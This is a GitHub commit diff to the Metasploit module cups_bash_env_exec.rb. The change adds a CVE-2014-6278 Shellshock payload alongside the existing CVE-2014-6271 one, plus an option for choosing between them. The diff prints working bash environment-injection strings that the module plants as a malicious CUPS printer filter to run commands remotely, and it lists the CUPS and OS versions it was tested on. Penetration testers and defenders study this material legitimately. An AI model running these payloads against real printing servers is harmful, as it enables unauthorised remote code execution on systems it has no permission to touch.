Skip to content

Commit 71a6ec8

Browse files
wvuwvu
committed
Land rapid7#4093, cups_bash_env_exec CVE-2014-6278 
2 parents 3de5c43 + 57baf0f commit 71a6ec8

File tree

1 file changed

+23
-2
lines changed

1 file changed

+23
-2
lines changed

modules/exploits/multi/http/cups_bash_env_exec.rb

Lines changed: 23 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -19,6 +19,7 @@ def initialize(info = {})
1919
},
2020
'Author' => [
2121
'Stephane Chazelas', # Vulnerability discovery
22+
'lcamtuf', # CVE-2014-6278
2223
'Brendan Coles <bcoles[at]gmail.com>' # msf
2324
],
2425
'References' => [
@@ -42,7 +43,11 @@ def initialize(info = {})
4243
'PayloadType' => 'cmd',
4344
'RequiredCmd' => 'generic bash awk ruby'
4445
},
45-
# Tested on CUPS 1.4.3 and 1.5.3
46+
# Tested:
47+
# - CUPS version 1.4.3 on Ubuntu 10.04 (x86)
48+
# - CUPS version 1.5.3 on Debian 7 (x64)
49+
# - CUPS version 1.6.2 on Fedora 19 (x64)
50+
# - CUPS version 1.7.2 on Ubuntu 14.04 (x64)
4651
'Targets' => [[ 'Automatic Targeting', { 'auto' => true } ]],
4752
'DefaultTarget' => 0,
4853
'DisclosureDate' => 'Sep 24 2014',
@@ -53,6 +58,7 @@ def initialize(info = {})
5358
OptBool.new('SSL', [ true, 'Use SSL', true ]),
5459
OptString.new('USERNAME', [ true, 'CUPS username', 'root']),
5560
OptString.new('PASSWORD', [ true, 'CUPS user password', '']),
61+
OptEnum.new('CVE', [ true, 'CVE to exploit', 'CVE-2014-6271', ['CVE-2014-6271', 'CVE-2014-6278'] ]),
5662
OptString.new('RPATH', [ true, 'Target PATH for binaries', '/bin' ])
5763
], self.class)
5864
end
@@ -64,6 +70,13 @@ def cve_2014_6271(cmd)
6470
%{() { :;}; $(#{cmd}) & }
6571
end
6672

73+
#
74+
# CVE-2014-6278
75+
#
76+
def cve_2014_6278(cmd)
77+
%{() { _; } >_[$($())] { echo -e "\r\n$(#{cmd})\r\n" ; }}
78+
end
79+
6780
#
6881
# Check credentials
6982
#
@@ -98,9 +111,17 @@ def exploit
98111
@cookie = rand_text_alphanumeric(16)
99112
printer_name = rand_text_alphanumeric(10 + rand(5))
100113

114+
# Select target CVE
115+
case datastore['CVE']
116+
when 'CVE-2014-6278'
117+
cmd = cve_2014_6278(payload.raw)
118+
else
119+
cmd = cve_2014_6271(payload.raw)
120+
end
121+
101122
# Add a printer containing the payload
102123
# with a CUPS filter pointing to /bin/bash
103-
res = add_printer(printer_name, cve_2014_6271(payload.raw))
124+
res = add_printer(printer_name, cmd)
104125
if !res
105126
fail_with(Failure::Unreachable, "#{peer} - Could not add printer - Connection failed.")
106127
elsif res.body =~ /Set Default Options for #{printer_name}/

0 commit comments

Comments
 (0)